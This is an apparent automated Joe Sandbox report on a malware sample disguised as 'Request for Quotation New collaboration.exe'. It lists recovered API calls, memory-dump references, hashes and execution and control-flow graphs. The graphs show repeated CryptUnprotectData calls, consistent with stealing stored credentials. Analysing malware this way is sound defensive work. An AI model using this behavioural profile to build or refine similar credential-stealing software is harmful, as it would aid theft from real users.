                                                                                                                                  • Instruction ID: 6247f5a3c9563be90945cd41d23768fa590745b080056b24a315d5606c671452
                                                                                                                                  • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                                                  • Instruction Fuzzy Hash: E5D05E21101921AAC21277448C04DDF669CEE45300384002AF200B20A2CB7C1D518BFD
                                                                                                                                  APIs
                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                                                  • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                                                  • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                                                    • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1404258612-0
                                                                                                                                  • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                                  • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                                                                                  • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                                  • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
                                                                                                                                  • lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
                                                                                                                                  • wsprintfW.USER32 ref: 1000160A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2037060970.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2037043192.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037076720.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037093643.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocGloballstrcpywsprintf
                                                                                                                                  • String ID: s<u
                                                                                                                                  • API String ID: 2689062267-779365171
                                                                                                                                  • Opcode ID: b666731ea850b0db34310f966fc1483e79c072b1553816228d181fcf3b6ead58
                                                                                                                                  • Instruction ID: 1bcf6e6733af89869fae1c20b53ab816a204ac51a82716e0e01f59040c2558f4
                                                                                                                                  • Opcode Fuzzy Hash: b666731ea850b0db34310f966fc1483e79c072b1553816228d181fcf3b6ead58
                                                                                                                                  • Instruction Fuzzy Hash: F8E0D830600821E7F121D7649C44ACD37A8FF412E67164115F706E618DCB228A424689
                                                                                                                                  APIs
                                                                                                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76F92EE0,004037F6,76F93420,00403621,?), ref: 00403839
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00403840
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403831
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 1100898210-297319885
                                                                                                                                  • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                                                                  • Instruction ID: bf490ea997193b46d556285b385326fb3516ec302950e4cd11f154ac4515a356
                                                                                                                                  • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                                                                  • Instruction Fuzzy Hash: F9E0C23394102057C7216F15ED04B1ABBE86F89B22F018476F9407B7A283746C528BED
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Request for Quotation New collaboration.exe,C:\Users\user\Desktop\Request for Quotation New collaboration.exe,80000000,00000003), ref: 00405987
                                                                                                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Request for Quotation New collaboration.exe,C:\Users\user\Desktop\Request for Quotation New collaboration.exe,80000000,00000003), ref: 00405997
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharPrevlstrlen
                                                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                                                  • API String ID: 2709904686-2743851969
                                                                                                                                  • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                                                  • Instruction ID: e5431d3d33a146c3150d202dfaa2e9e12a1dec100281116c20088c3141bfb115
                                                                                                                                  • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                                                  • Instruction Fuzzy Hash: C6D05EA2414920DED3226704DC44AAFA3ACEF113107894466F901E61A5D7785C808AFD
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                                                    • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2037060970.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2037043192.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037076720.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037093643.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Free$Alloclstrcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 852173138-0
                                                                                                                                  • Opcode ID: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                                                  • Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
                                                                                                                                  • Opcode Fuzzy Hash: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                                                  • Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765
                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                  • lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
                                                                                                                                  • CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
                                                                                                                                  • lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                  • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                                  • Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
                                                                                                                                  • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                                  • Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:13%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:2.6%
                                                                                                                                  Total number of Nodes:229
                                                                                                                                  Total number of Limit Nodes:17
                                                                                                                                  execution_graph 44635 38450460 44636 38450476 44635->44636 44638 38450558 44635->44638 44640 38450568 44638->44640 44639 38450585 44639->44636 44640->44639 44643 384505f9 44640->44643 44654 38450608 44640->44654 44644 38450608 GetCurrentProcess 44643->44644 44646 384506a0 GetCurrentThread 44644->44646 44649 38450699 44644->44649 44647 384506dd GetCurrentProcess 44646->44647 44650 384506d6 44646->44650 44648 38450713 44647->44648 44665 384507d7 44648->44665 44649->44646 44650->44647 44652 3845076c 44652->44639 44655 3845064e GetCurrentProcess 44654->44655 44657 384506a0 GetCurrentThread 44655->44657 44659 38450699 44655->44659 44658 384506dd GetCurrentProcess 44657->44658 44660 384506d6 44657->44660 44661 38450713 44658->44661 44659->44657 44660->44658 44664 384507d7 2 API calls 44661->44664 44662 3845073b GetCurrentThreadId 44663 3845076c 44662->44663 44663->44639 44664->44662 44669 38450850 DuplicateHandle 44665->44669 44671 38450849 44665->44671 44666 3845073b GetCurrentThreadId 44666->44652 44670 384508e6 44669->44670 44670->44666 44672 38450850 DuplicateHandle 44671->44672 44673 384508e6 44672->44673 44673->44666 44674 38451cc0 SetTimer 44675 38451d2c 44674->44675 44676 38451d60 44679 38451d8d 44676->44679 44677 38451ddc 44679->44677 44680 3845153c 44679->44680 44681 38451547 44680->44681 44683 38451f3c 44681->44683 44684 38451504 44681->44684 44683->44677 44685 3845150f 44684->44685 44688 3845155c 44685->44688 44687 38451f95 44687->44683 44689 38451567 44688->44689 44690 38452101 GetCurrentThreadId 44689->44690 44691 3845212b 44689->44691 44690->44691 44691->44687 44692 ad030 44693 ad048 44692->44693 44698 ad0a2 44693->44698 44699 15ff50 44693->44699 44704 38451870 44693->44704 44715 38451860 44693->44715 44726 15ff40 44693->44726 44703 15ff76 44699->44703 44700 15ff97 44700->44698 44701 38451860 2 API calls 44701->44700 44702 38451870 2 API calls 44702->44700 44703->44701 44703->44702 44707 3845189d 44704->44707 44705 384518d1 44708 384518cf 44705->44708 44765 384514e4 44705->44765 44707->44705 44709 384518c1 44707->44709 44709->44708 44731 38459bc4 44709->44731 44737 38459af8 44709->44737 44742 38459ae8 44709->44742 44747 384519f8 44709->44747 44756 384519e8 44709->44756 44717 38451870 44715->44717 44716 384518d1 44718 384514e4 CallWindowProcW 44716->44718 44720 384518cf 44716->44720 44717->44716 44719 384518c1 44717->44719 44718->44720 44719->44720 44721 38459bc4 CallWindowProcW 44719->44721 44722 384519e8 2 API calls 44719->44722 44723 384519f8 2 API calls 44719->44723 44724 38459ae8 CallWindowProcW 44719->44724 44725 38459af8 CallWindowProcW 44719->44725 44720->44720 44721->44720 44722->44720 44723->44720 44724->44720 44725->44720 44727 15ff50 44726->44727 44729 38451860 2 API calls 44727->44729 44730 38451870 2 API calls 44727->44730 44728 15ff97 44728->44698 44729->44728 44730->44728 44732 38459b82 44731->44732 44733 38459bd2 44731->44733 44769 38459ba2 44732->44769 44772 38459bb0 44732->44772 44734 38459b98 44734->44708 44738 38459b0c 44737->44738 44740 38459bb0 CallWindowProcW 44738->44740 44741 38459ba2 CallWindowProcW 44738->44741 44739 38459b98 44739->44708 44740->44739 44741->44739 44743 38459b0c 44742->44743 44745 38459bb0 CallWindowProcW 44743->44745 44746 38459ba2 CallWindowProcW 44743->44746 44744 38459b98 44744->44708 44745->44744 44746->44744 44748 38451a06 44747->44748 44749 38451a33 44747->44749 44750 38451a0e 44748->44750 44752 384514e4 CallWindowProcW 44748->44752 44749->44748 44751 38451a38 44749->44751 44750->44708 44753 38451504 GetCurrentThreadId 44751->44753 44754 38451a4c 44752->44754 44755 38451a44 44753->44755 44754->44708 44755->44708 44757 384519f8 44756->44757 44758 38451a06 44757->44758 44760 38451a38 44757->44760 44759 38451a0e 44758->44759 44761 384514e4 CallWindowProcW 44758->44761 44759->44708 44762 38451504 GetCurrentThreadId 44760->44762 44763 38451a4c 44761->44763 44764 38451a44 44762->44764 44763->44708 44764->44708 44766 384514ef 44765->44766 44767 38451afa CallWindowProcW 44766->44767 44768 38451aa9 44766->44768 44767->44768 44768->44708 44770 38459bc1 44769->44770 44775 3845ad80 44769->44775 44770->44734 44773 3845ad80 CallWindowProcW 44772->44773 44774 38459bc1 44772->44774 44773->44774 44774->44734 44776 384514e4 CallWindowProcW 44775->44776 44777 3845ad8a 44776->44777 44777->44770 44778 15b158 44779 15b174 44778->44779 44785 15e470 44779->44785 44780 15b1a3 44790 384523c1 44780->44790 44796 384523d0 44780->44796 44786 15e48c 44785->44786 44802 351aa928 44786->44802 44806 351aa919 44786->44806 44787 15e4c2 44787->44780 44791 384523df 44790->44791 44792 38450558 10 API calls 44791->44792 44793 384523e6 44792->44793 44833 3845161c 44793->44833 44797 384523df 44796->44797 44798 38450558 10 API calls 44797->44798 44799 384523e6 44798->44799 44800 3845161c 14 API calls 44799->44800 44801 15b1b1 44800->44801 44804 351aa94a 44802->44804 44803 351aadd9 44803->44787 44804->44803 44810 351ab1e1 44804->44810 44808 351aa94a 44806->44808 44807 351aadd9 44807->44787 44808->44807 44809 351ab1e1 CryptUnprotectData 44808->44809 44809->44808 44811 351ab1f0 44810->44811 44815 351ab830 44811->44815 44822 351ab820 44811->44822 44812 351ab260 44812->44804 44816 351ab855 44815->44816 44819 351ab909 44815->44819 44816->44819 44820 351ab830 CryptUnprotectData 44816->44820 44821 351ab820 CryptUnprotectData 44816->44821 44830 351ab4c0 44819->44830 44820->44819 44821->44819 44823 351ab7d4 44822->44823 44824 351ab82a 44822->44824 44823->44812 44827 351ab909 44824->44827 44828 351ab830 CryptUnprotectData 44824->44828 44829 351ab820 CryptUnprotectData 44824->44829 44825 351ab4c0 CryptUnprotectData 44826 351abad5 44825->44826 44826->44812 44827->44825 44828->44827 44829->44827 44831 351abcc0 CryptUnprotectData 44830->44831 44832 351abad5 44831->44832 44832->44812 44834 38451627 44833->44834 44837 384516c4 44834->44837 44836 384524d6 44836->44836 44843 384516cf 44837->44843 44838 38452bf9 44839 38452c29 44838->44839 44840 3845296c 11 API calls 44838->44840 44844 38452c54 44839->44844 44859 3845296c 44839->44859 44840->44839 44842 38452c41 44842->44844 44865 3845d477 44842->44865 44872 3845d478 44842->44872 44843->44838 44843->44844 44849 38453fc0 44843->44849 44854 38453f90 44843->44854 44844->44836 44850 38453fe1 44849->44850 44851 38454005 44850->44851 44879 38454170 44850->44879 44885 3845415f 44850->44885 44851->44838 44855 38453fe1 44854->44855 44856 38454005 44855->44856 44857 38454170 10 API calls 44855->44857 44858 3845415f 10 API calls 44855->44858 44856->44838 44857->44856 44858->44856 44860 38452977 44859->44860 44861 38450558 10 API calls 44860->44861 44864 3845cf11 44860->44864 44862 3845cf2b 44861->44862 44903 3845c3f4 44862->44903 44864->44842 44871 3845d478 44865->44871 44866 3845d709 44867 38450558 10 API calls 44866->44867 44869 3845d52a 44867->44869 44868 3845d940 WaitMessage 44868->44871 44869->44844 44871->44866 44871->44868 44871->44869 44910 3845c4bc 44871->44910 44878 3845d4dd 44872->44878 44873 3845d709 44874 38450558 10 API calls 44873->44874 44876 3845d52a 44874->44876 44875 3845d940 WaitMessage 44875->44878 44876->44844 44877 3845c4bc DispatchMessageW 44877->44878 44878->44873 44878->44875 44878->44876 44878->44877 44880 3845417d 44879->44880 44881 38450558 10 API calls 44880->44881 44882 384541ab 44881->44882 44884 384541b6 44882->44884 44891 38452efc 44882->44891 44884->44851 44886 3845417d 44885->44886 44887 38450558 10 API calls 44886->44887 44888 384541ab 44887->44888 44889 384541b6 44888->44889 44890 38452efc 10 API calls 44888->44890 44889->44851 44890->44889 44892 38452f07 44891->44892 44894 38454228 44892->44894 44895 38452f30 44892->44895 44894->44894 44896 38452f3b 44895->44896 44899 38452f40 44896->44899 44898 38454297 44898->44894 44902 38452f4b 44899->44902 44900 38455440 44900->44898 44901 38453fc0 10 API calls 44901->44900 44902->44900 44902->44901 44904 3845c3ff 44903->44904 44905 3845d22b 44904->44905 44907 3845c410 44904->44907 44905->44864 44908 3845d260 OleInitialize 44907->44908 44909 3845d2c4 44908->44909 44909->44905 44911 3845e568 DispatchMessageW 44910->44911 44912 3845e5d4 44911->44912 44912->44871 44913 15fd98 44914 15fe00 CreateWindowExW 44913->44914 44916 15febc 44914->44916

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 817 3845d478-3845d4db 818 3845d4dd-3845d507 817->818 819 3845d50a-3845d528 817->819 818->819 824 3845d531-3845d568 819->824 825 3845d52a-3845d52c 819->825 829 3845d56e-3845d582 824->829 830 3845d999 824->830 827 3845d9ea-3845d9ff 825->827 831 3845d584-3845d5ae 829->831 832 3845d5b1-3845d5d0 829->832 833 3845d99e-3845d9b4 830->833 831->832 839 3845d5d2-3845d5d8 832->839 840 3845d5e8-3845d5ea 832->840 833->827 841 3845d5dc-3845d5de 839->841 842 3845d5da 839->842 843 3845d5ec-3845d604 840->843 844 3845d609-3845d612 840->844 841->840 842->840 843->833 846 3845d61a-3845d621 844->846 847 3845d623-3845d629 846->847 848 3845d62b-3845d632 846->848 849 3845d63f-3845d65c call 3845c470 847->849 850 3845d634-3845d63a 848->850 851 3845d63c 848->851 854 3845d7b1-3845d7b5 849->854 855 3845d662-3845d669 849->855 850->849 851->849 857 3845d984-3845d997 854->857 858 3845d7bb-3845d7bf 854->858 855->830 856 3845d66f-3845d6ac 855->856 866 3845d6b2-3845d6b7 856->866 867 3845d97a-3845d97e 856->867 857->833 859 3845d7c1-3845d7d4 858->859 860 3845d7d9-3845d7e2 858->860 859->833 862 3845d7e4-3845d80e 860->862 863 3845d811-3845d818 860->863 862->863 864 3845d8b7-3845d8be 863->864 865 3845d81e-3845d825 863->865 873 3845d8c7-3845d8cc 864->873 868 3845d854-3845d876 865->868 869 3845d827-3845d851 865->869 870 3845d6e9-3845d6fe call 3845c494 866->870 871 3845d6b9-3845d6c7 call 3845c47c 866->871 867->846 867->857 868->864 905 3845d878-3845d882 868->905 869->868 880 3845d703-3845d707 870->880 871->870 884 3845d6c9-3845d6e7 call 3845c488 871->884 873->867 876 3845d8d2-3845d8d4 873->876 882 3845d8d6-3845d90f 876->882 883 3845d921-3845d93e call 3845c470 876->883 885 3845d709-3845d71b call 38450558 call 3845c4a0 880->885 886 3845d778-3845d785 880->886 900 3845d911-3845d917 882->900 901 3845d918-3845d91f 882->901 883->867 903 3845d940-3845d96c WaitMessage 883->903 884->880 911 3845d71d-3845d74d 885->911 912 3845d75b-3845d773 885->912 886->867 904 3845d78b-3845d795 call 3845c4b0 886->904 900->901 901->867 907 3845d973 903->907 908 3845d96e 903->908 914 3845d7a4-3845d7ac call 3845c4c8 904->914 915 3845d797-3845d79a call 3845c4bc 904->915 919 3845d884-3845d88a 905->919 920 3845d89a-3845d8b5 905->920 907->867 908->907 926 3845d754 911->926 927 3845d74f 911->927 912->833 914->867 922 3845d79f 915->922 924 3845d88c 919->924 925 3845d88e-3845d890 919->925 920->864 920->905 922->867 924->920 925->920 926->912 927->926
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837563871.0000000038450000.00000040.00000800.00020000.00000000.sdmp, Offset: 38450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_38450000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DispatchMessage
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2061451462-0
                                                                                                                                  • Opcode ID: 48d1dab81f75475749b552b215642d9a89fd78c7ae3f0682c941247df7766912
                                                                                                                                  • Instruction ID: ac3548e53b252b70f60e9a8a4ee3bfa53514c35aa11dc8ae99949d843313a836
                                                                                                                                  • Opcode Fuzzy Hash: 48d1dab81f75475749b552b215642d9a89fd78c7ae3f0682c941247df7766912
                                                                                                                                  • Instruction Fuzzy Hash: AFF13974A00309DFEB04DFA9C844B9DBBF2BF88314F158569E409AB765DB74A946CF80

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1107 351ab4c0-351abd32 CryptUnprotectData 1109 351abd3b-351abd63 1107->1109 1110 351abd34-351abd3a 1107->1110 1110->1109
                                                                                                                                  APIs
                                                                                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 351ABD25
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2835591179.00000000351A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 351A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_351a0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                  • Opcode ID: 8ee15e219ee94b2efd784ce31d963f9b175b0c2f492309aa8eca09d5c9c853df
                                                                                                                                  • Instruction ID: 33ed69151b2f580157d7ce1b60b80eeabbe4cc9e7f1fd84e7d53ec0787e5762e
                                                                                                                                  • Opcode Fuzzy Hash: 8ee15e219ee94b2efd784ce31d963f9b175b0c2f492309aa8eca09d5c9c853df
                                                                                                                                  • Instruction Fuzzy Hash: 4D1117768002899FDB21CF99C845BEFBBF4EB48320F148459E554A7210C379A550CFA5

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1113 351abcb8-351abd32 CryptUnprotectData 1114 351abd3b-351abd63 1113->1114 1115 351abd34-351abd3a 1113->1115 1115->1114
                                                                                                                                  APIs
                                                                                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 351ABD25
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2835591179.00000000351A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 351A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_351a0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                  • Opcode ID: e4e5b73d9dfa2a42e605cc04ccc72f3b60b86a75fda9d3a5dfbd373d6dae3319
                                                                                                                                  • Instruction ID: ae5b7b331958da820b8e09824b3180edd9434830ec483143d5c82f6923d12a7f
